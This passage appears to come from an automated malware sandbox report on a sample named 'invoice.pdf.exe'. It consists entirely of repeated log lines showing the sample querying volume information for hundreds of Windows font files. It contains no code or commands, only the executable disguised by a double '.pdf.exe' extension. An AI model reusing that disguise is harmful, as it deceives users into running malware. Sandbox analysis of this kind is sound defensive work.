Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
